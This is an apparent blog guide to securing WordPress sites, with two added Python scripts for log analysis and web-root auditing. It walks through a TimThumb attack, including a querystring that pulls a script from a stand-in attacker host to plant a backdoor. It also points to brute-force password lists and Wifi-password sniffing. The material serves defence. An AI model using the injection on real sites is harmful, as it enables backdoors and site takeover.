How to Approach Security
The key is the mindset. If you go out looking for how to patch holes all day, you will never figure out how to find holes. It’s easy to find the holes that hackers find once you know what to look for. Think like a hacker.
Footprints
Holes have footprints. Hackers have automated the footprint-finding to a reasonable degree. How do they do it? It’s fairly simple. They load up a program like WPScan (specifically for WordPress). WPScan acts in many ways like Scrapebox looking for a place to leave a comment.
WPScan looks for the top known exploits (likely posted on Exploit Database by Offensive Security; some of our posts on the old forum wound up there). Usually it’s a plugin. WPScan requests each individual plugin file, like .com/wp-content/plugins/exploit-plugin-here/readme.html. If the readme.html file returns a 200 (and usually contains the version number), the program alerts the hacker to the hole, and the hacker then attacks the site knowing exactly which exploit to use. No further research needed.
Sometimes an exploit will affect a ridiculously large number of sites. When TimThumb’s exploit hit, people just used Google to search for footprints of the theme developers who used TimThumb. (Hint: always be wary of querystrings.) Hackers then just ran simple querystrings that uploaded a backdoor to the server, making it easy for Russians to add buy-viagra links to thousands of sites while cloaking them from the webmaster.
Let’s make this a little easier to explain.
1. The hacker goes to Google and gets results for intext:”Theme Developed by Dumbass”.
2. Grabs the list of sites, knowing they all use TimThumb (an image resizing script).
3. Types in poorsuckersdomain.com/?resizethis=http://hackersite.com/badscript.js
4. And now has a backdoor that only the hacker can access. Make sense?
In reality, hackers don’t even need Google. There are search engines like https://meanpath.com that literally let people search the source code of the entire web. Some people run their own web scrapers and share that data within their own search engine.
Those are the basics of how hackers use footprints, and they should open your mind to how hackers operate.
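The two footprint patterns above (plugin readme probing and a remote URL stuffed into a querystring) leave obvious traces in your own access log. Here is an added example, not code from the original post, that flags both in Apache combined-format log lines; the sample lines, IPs and plugin names are constructed, and the probe threshold is an assumption you should tune for your traffic.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Plugin readme files are what version-fingerprinting scanners request one by one.
README_RE = re.compile(r'^/wp-content/plugins/[^/]+/readme\.(?:html|txt)$', re.I)

# Constructed sample traffic (documentation IP ranges, hypothetical plugin names).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/plugin-a/readme.txt HTTP/1.1" 200 512 "-" "scanner/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/plugin-b/readme.html HTTP/1.1" 404 210 "-" "scanner/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/plugin-c/readme.html HTTP/1.1" 200 640 "-" "scanner/1.0"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /?resizethis=http://example.net/badscript.js HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:13:57:10 +0000] "GET /about/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

def analyze(log_text, readme_threshold=3):
    """Return {client_ip: [finding, ...]} for the two footprint patterns above."""
    probes = defaultdict(lambda: [0, 0])          # ip -> [requests, answered 200]
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                # skip lines in another format
        ip, target = m.group("ip"), urlsplit(m.group("target"))
        if README_RE.match(target.path):
            probes[ip][0] += 1
            probes[ip][1] += int(m.group("status") == "200")
        # TimThumb-style abuse: a query parameter whose value is a remote URL.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if value.lower().startswith(("http://", "https://")):
                findings[ip].append(f"remote URL in query parameter '{key}': {value}")
    for ip, (total, ok) in probes.items():
        if total >= readme_threshold:
            findings[ip].append(f"{total} plugin readme probes, {ok} answered 200")
    return dict(findings)

if __name__ == "__main__":
    for ip, items in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(items))
```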
Motivation
For some hackers it’s the lulz (laughs). For some it’s to build a white-hat hacking career and get a job at a place like Sucuri. The Syrian Electronic Army is all about political statements. Anonymous is about sending a powerful message. There are many sects of hackers.
But financial gain is usually the key motivator. Some Russian link networks are incredible, and thus pretty expensive. Typically Russian networks are all hacked sites. The players in sex cam, porn, gambling, and penis pill niches employ the hackers. Hackers know the link game. They make serious money on it. A few become affiliates and do SEO themselves.
Hackers don’t even have to bother with the risk of being caught stealing credit card info (that’s called carding, c4rding, c4rd1ng, etc.). They can make serious money selling links and run a low risk of governments ever cracking down on them.
Being Safe
Old Plugins
The easiest exploit of all time is to find old plugins that haven’t been patched. It’s simple, just update your plugins regularly. Occasionally new exploits will show up with a new version, but it is very rare. Just stay up to date.
If you are afraid you will break your site, remember you’re at a greater risk of a hacker breaking the site by leaving old plugins running.
Best Practice
Keep an eye on your own footprint. Run a site: search to see what gets indexed. When W3TC’s database exploit (found by one of our own) became well-known, the footprint was insanely large. It was easily avoidable by disabling directory browsing, one of the worst features Apache has ever created.
The bottom line is, try to find your own footprints. Look in your FTP folders and see if you do some “stupid” things like store backups with the name backup.zip in the root folder. Congratulations, there is your entire database waiting for some hacker to download.
Better WP Security
We love Better WP Security. Really, all security plugins do the same thing. This is our favorite. We aren’t going to tell you which settings we use on which sites because they change, and we don’t want a footprint or a smart hacker in the group to show us.
Yes, Better WP Security itself had an exploit. It’s patched. Always stay up to date and you won’t have a problem.
Directory Browsing
As mentioned earlier, this one shows everything in your FTP backend if there is no index file to say otherwise. Google sees those listings as 200 codes and indexes them, which is also bad for SEO because of wasted juice and content issues. Better WP Security has an option to fix it. But if you’re not on WordPress, just add the following line to .htaccess:
Options -Indexes
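To check your own footprint the way the Best Practice and Directory Browsing sections describe, you can walk a local copy of your web root offline. This added example (not from the original post) reports archives like backup.zip that anyone could download and directories Apache would list because they lack an index file, and it honours an Options -Indexes line in the root .htaccess; the sample tree it builds is constructed.

```python
import os
import re
import tempfile

# Names that hand a visitor your database or a site archive straight over HTTP.
ARCHIVE_RE = re.compile(r'\.(?:zip|tar|tgz|tar\.gz|sql|sql\.gz|bak)$', re.I)
INDEX_FILES = {"index.html", "index.htm", "index.php"}

def indexes_disabled(root):
    """True if the web root's .htaccess carries an Options line with -Indexes.
    Only the root file is read; a deeper .htaccess could still re-enable it."""
    path = os.path.join(root, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path) as fh:
        return any(re.match(r'\s*Options\b.*-Indexes', line) for line in fh)

def audit_webroot(root):
    """Walk a local copy of the web root and return two sorted lists of
    root-relative paths: archives anyone can download, and directories
    Apache would list because they have no index file."""
    exposed, listable = [], []
    listing_on = not indexes_disabled(root)
    for dirpath, _dirs, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        rel = "" if rel == "." else rel
        if listing_on and not (set(filenames) & INDEX_FILES):
            listable.append(rel or "/")
        for name in filenames:
            if ARCHIVE_RE.search(name):
                exposed.append(os.path.join(rel, name))
    return {"exposed_archives": sorted(exposed), "listable_dirs": sorted(listable)}

def build_sample_root(with_htaccess=False):
    """Constructed example tree, not a real site: backup.zip sits beside
    index.php in the root, and wp-content/uploads has no index file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    files = ["index.php", "backup.zip", "wp-content/index.php",
             "wp-content/uploads/photo.jpg"]
    if with_htaccess:
        files.append(".htaccess")
    for rel in files:
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("Options -Indexes\n" if rel == ".htaccess" else "x")
    return root

if __name__ == "__main__":
    print(audit_webroot(build_sample_root()))
```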
E-commerce
If you’re handling credit card data, you must work to become PCI Compliant. Usually there are extensions that handle all of this work for you. The bottom line is this:
1. Your backend should not be able to display CC info.
2. Your FTP access should be on a different address.
3. Your database should be on another server.
Want an easy way to do it? Use Synthesis, WooCommerce, and Authorize.net CIM. Problems solved.
We have seen too many sites built on Magento that just have credit card data sitting on a $2 host with no security for the backend where the credit card data is viewable. It’s absolutely insane. Just run users through an off-site payment platform before you handle credit cards if you aren’t ready.
HTTPS
This is a fun one now that top sources tell us HTTPS is useless (at least for hiding data from the NSA). It still keeps the average hacker away.
HTTPS will have its own section here as it has its own complications. If you can’t get the padlock to show correctly on your site, use Why No Padlock. If you want the green bar saying who you are, there are more hoops to jump through, but that’s called an E.V. certificate. Data is no more encrypted this way; it’s a feel-good security solution.
Right now we prefer Comodo for security certificates. GoDaddy and the others just reek of “cheap”.
Wifi Spying
Anytime that you share a Wifi connection with someone (very common in large universities, libraries, airports, conferences, etc.) you run the risk of being hacked. A huge risk, especially if your email account isn’t through HTTPS connections. If your mail on mobile doesn’t run through HTTPS, fix it immediately or disable Wifi.
So how hard is it to hack someone via Wifi? Someone made a user interface called Firesheep. It’s insanely easy to hack this way. All it does is hijack cookie sessions. This exploit was around for years and known to Facebook and Google, and still no security remedy was given to the masses because of how expensive it was to convert the networks to HTTPS by default.
Need to break into a wifi network? That’s illegal and we can’t recommend it, but some have been brave enough to post about how to use Wireshark to get Wifi passwords.
Cell Hacking
This has nothing to do with the normal realm of security, but some inquiring minds like to know how it’s done. Instead of hijacking cookie sessions as done with Wifi Spying.
Passwords
Please, please, please make your passwords complex. 1Password has a generator and is also an excellent password management solution.
DarkC0de has a nice list of passwords to brute force login attempts. A ton of passwords are on here. Don’t be a fool.
Usernames are also important but often forgotten. Avoid “Admin” for your logins. Use the brand name at least.
Password Management Solutions For Teams
The SSO (single sign on) solutions that mega-sized companies use are too big for our tastes. The teams should be under contract so you don’t have to go change hundreds of passwords. If you want random outsourcers to have access, use something like SimpleSafe to assign rights, then have a staffer change them after the project is complete.
Personal Profiling
Profiling (Mother’s maiden name, dog’s name, birthdate) – sometimes all this data is available on Facebook. You may want to create a sub-set of answers that aren’t true. When it asks for “city where you met your significant other” make it a rule to only put the state or county. When it asks for dog’s name, pick a random dog and always use it. Don’t be so quick to answer these, and be careful who finds the info.
Sometimes, security-question sources are worked against each other. As one Wired.com writer found, a hacker used Apple and Amazon against each other to gain access to his entire digital life.
Summary
Use Better WP Security.
If you take credit cards, get PCI compliant.
Keep your plugins up to date.
Options -Indexes is your friend.
Make passwords that can’t be brute-forced.
Avoid admin usernames.
Be careful on Wifi.
Think like a hacker.